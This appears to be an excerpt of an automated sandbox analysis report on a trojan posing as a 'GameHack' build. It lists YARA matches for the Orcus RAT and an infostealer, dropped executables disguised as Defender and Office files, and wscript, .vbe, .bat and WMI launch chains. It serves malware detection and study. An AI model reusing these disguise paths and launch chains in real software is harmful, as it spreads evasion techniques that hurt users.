                      Source: QLuoYXmy.log.23.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: wowiEjmi.log.23.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: ErvIhhWY.log.23.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: syFrxmlp.log.23.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: brpMezGb.log.23.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: SSblKNNQege.exe.26.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: RuntimeBroker.exe.26.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: SSblKNNQege.exe0.26.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: SSblKNNQege.exe1.26.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: SSblKNNQege.exe2.26.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: SSblKNNQege.exe3.26.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: SSblKNNQege.exe4.26.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: SSblKNNQege.exe5.26.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: RuntimeBroker.exe0.26.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs GameHackBuild1.exe.bin.exe
                      Source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamej% vs GameHackBuild1.exe.bin.exe
                      Source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1266289893.0000000006F0D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs GameHackBuild1.exe.bin.exe
                      Source: GameHackBuild1.exe.bin.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 13.2.MpDefenderCoreProtion.exe.46090d0.6.unpack, type: UNPACKEDPEMatched rule: RAT_Orcus date = 2017/01, filetype = memory, author = J from THL <j@techhelplist.com> with thx to MalwareHunterTeam, version = RAT, reference = https://virustotal.com/en/file/0ef747363828342c184303f2d6fbead054200e9c223e5cfc4777cda03006e317/analysis/
                      Source: 13.2.MpDefenderCoreProtion.exe.46090d0.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: 7.0.MpDefenderProtector.exe.240000.0.unpack, type: UNPACKEDPEMatched rule: RAT_Orcus date = 2017/01, filetype = memory, author = J from THL <j@techhelplist.com> with thx to MalwareHunterTeam, version = RAT, reference = https://virustotal.com/en/file/0ef747363828342c184303f2d6fbead054200e9c223e5cfc4777cda03006e317/analysis/
                      Source: 7.0.MpDefenderProtector.exe.240000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: 13.2.MpDefenderCoreProtion.exe.46090d0.6.raw.unpack, type: UNPACKEDPEMatched rule: RAT_Orcus date = 2017/01, filetype = memory, author = J from THL <j@techhelplist.com> with thx to MalwareHunterTeam, version = RAT, reference = https://virustotal.com/en/file/0ef747363828342c184303f2d6fbead054200e9c223e5cfc4777cda03006e317/analysis/
                      Source: 13.2.MpDefenderCoreProtion.exe.46090d0.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: RAT_Orcus date = 2017/01, filetype = memory, author = J from THL <j@techhelplist.com> with thx to MalwareHunterTeam, version = RAT, reference = https://virustotal.com/en/file/0ef747363828342c184303f2d6fbead054200e9c223e5cfc4777cda03006e317/analysis/
                      Source: 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: RAT_Orcus date = 2017/01, filetype = memory, author = J from THL <j@techhelplist.com> with thx to MalwareHunterTeam, version = RAT, reference = https://virustotal.com/en/file/0ef747363828342c184303f2d6fbead054200e9c223e5cfc4777cda03006e317/analysis/
                      Source: 00000007.00000000.1286933996.0000000000242000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: RAT_Orcus date = 2017/01, filetype = memory, author = J from THL <j@techhelplist.com> with thx to MalwareHunterTeam, version = RAT, reference = https://virustotal.com/en/file/0ef747363828342c184303f2d6fbead054200e9c223e5cfc4777cda03006e317/analysis/
                      Source: Process Memory Space: GameHackBuild1.exe.bin.exe PID: 7292, type: MEMORYSTRMatched rule: RAT_Orcus date = 2017/01, filetype = memory, author = J from THL <j@techhelplist.com> with thx to MalwareHunterTeam, version = RAT, reference = https://virustotal.com/en/file/0ef747363828342c184303f2d6fbead054200e9c223e5cfc4777cda03006e317/analysis/
                      Source: Process Memory Space: MpDefenderCoreProtion.exe PID: 7932, type: MEMORYSTRMatched rule: RAT_Orcus date = 2017/01, filetype = memory, author = J from THL <j@techhelplist.com> with thx to MalwareHunterTeam, version = RAT, reference = https://virustotal.com/en/file/0ef747363828342c184303f2d6fbead054200e9c223e5cfc4777cda03006e317/analysis/
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe, type: DROPPEDMatched rule: RAT_Orcus date = 2017/01, filetype = memory, author = J from THL <j@techhelplist.com> with thx to MalwareHunterTeam, version = RAT, reference = https://virustotal.com/en/file/0ef747363828342c184303f2d6fbead054200e9c223e5cfc4777cda03006e317/analysis/
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe, type: DROPPEDMatched rule: RAT_Orcus date = 2017/01, filetype = memory, author = J from THL <j@techhelplist.com> with thx to MalwareHunterTeam, version = RAT, reference = https://virustotal.com/en/file/0ef747363828342c184303f2d6fbead054200e9c223e5cfc4777cda03006e317/analysis/
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: runtimesvc.exe.0.drStatic PE information: Section: .reloc ZLIB complexity 1.001953125
                      Source: SSblKNNQege.exe.23.drStatic PE information: Section: .reloc ZLIB complexity 1.001953125
                      Source: SSblKNNQege.exe0.23.drStatic PE information: Section: .reloc ZLIB complexity 1.001953125
                      Source: SSblKNNQege.exe1.23.drStatic PE information: Section: .reloc ZLIB complexity 1.001953125
                      Source: SSblKNNQege.exe2.23.drStatic PE information: Section: .reloc ZLIB complexity 1.001953125
                      Source: OfficeClickToRun.exe.23.drStatic PE information: Section: .reloc ZLIB complexity 1.001953125
                      Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@62/65@1/2
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A06EC9 GetLastError,FormatMessageW,0_2_00A06EC9
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: 0_2_00A19E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00A19E1C
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeFile created: C:\Program Files (x86)\msecache\OfficeKMS\win8\SSblKNNQege.exe
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeFile created: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitorJump to behavior
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeMutant created: NULL
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\sudo_06kkh814g4vz7sfklrh1emcow75dz383
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7616:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeMutant created: \Sessions\1\BaseNamedObjects\Local\de7a0557f40c2628828635c8b21d0fdfc2f95fd1
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-KJuu1JY0vqv02KLL4nsh
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8376:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8132:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7736:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeFile created: C:\Users\user\AppData\Local\Temp\tv1xqdyv
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\DaJttDh54LCmoatNZvevDoWyEmexKWgun1WAXP2cdZM0egnWJQQpZtVxW.bat" "
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCommand line argument: sfxname0_2_00A1D5D4
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCommand line argument: sfxstime0_2_00A1D5D4
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCommand line argument: STARTDLG0_2_00A1D5D4
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCommand line argument: sfxname8_2_00EED5D4
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCommand line argument: sfxstime8_2_00EED5D4
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCommand line argument: STARTDLG8_2_00EED5D4
                      Source: GameHackBuild1.exe.bin.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeFile read: C:\Windows\win.iniJump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: GameHackBuild1.exe.bin.exeVirustotal: Detection: 61%
                      Source: GameHackBuild1.exe.bin.exeReversingLabs: Detection: 63%
                      Source: Solara.exeString found in binary or memory: c/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: c
                      Source: Solara.exeString found in binary or memory: c/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: c
                      Source: Solara.exeString found in binary or memory: C:/Program Files/Go/src/net/addrselect.go
                      Source: Solara.exeString found in binary or memory: es/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery
                      Source: Solara.exeString found in binary or memory: es/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery
                      Source: Solara.exeString found in binary or memory: C:/Users/h3xcode/go/pkg/mod/github.com/lxn/walk@v0.0.0-20210112085537-c389da54e794/stopwatch.go
                      Source: Solara.exeString found in binary or memory: C:/Users/h3xcode/go/pkg/mod/github.com/lxn/walk@v0.0.0-20210112085537-c389da54e794/stopwatch.go
                      Source: Solara.exeString found in binary or memory: faceinteger overflow on token CreateBrushIndirect failedSHGetPathFromIDList failed\o/ Walk_TabPage_Class \o/\o/ Walk_WebView_Class \o/AddClipboardFormatListenerGetConsoleScreenBufferInfoempty buffer in CopyBufferhttp: invalid cookie valueread from empty dataBu
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeFile read: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe "C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe"
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\VaCm6yonii0zLXLvCqreXRVqw1.vbe"
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeProcess created: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe"
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeProcess created: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe"
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeProcess created: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe"
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\chainReviewdhcp\mJEJ7PbY35CMaAu5227dvHv.vbe"
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeProcess created: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe "C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\DaJttDh54LCmoatNZvevDoWyEmexKWgun1WAXP2cdZM0egnWJQQpZtVxW.bat" "
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor/runtimesvc.exe"
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\chainReviewdhcp\LJrjU6BhAd6hMsY1uw5hl2I0p3Jh.bat" "
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe "C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe"
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get model,serialnumber
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tv1xqdyv\tv1xqdyv.cmdline"
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES5B8E.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC8F87101CD76241BAB3866A995ECAD4A7.TMP"
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\VaCm6yonii0zLXLvCqreXRVqw1.vbe" Jump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeProcess created: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe" Jump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeProcess created: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe" Jump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeProcess created: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe" Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\DaJttDh54LCmoatNZvevDoWyEmexKWgun1WAXP2cdZM0egnWJQQpZtVxW.bat" "Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeProcess created: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe "C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\chainReviewdhcp\mJEJ7PbY35CMaAu5227dvHv.vbe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get model,serialnumberJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeProcess created: unknown unknownJump to behavior
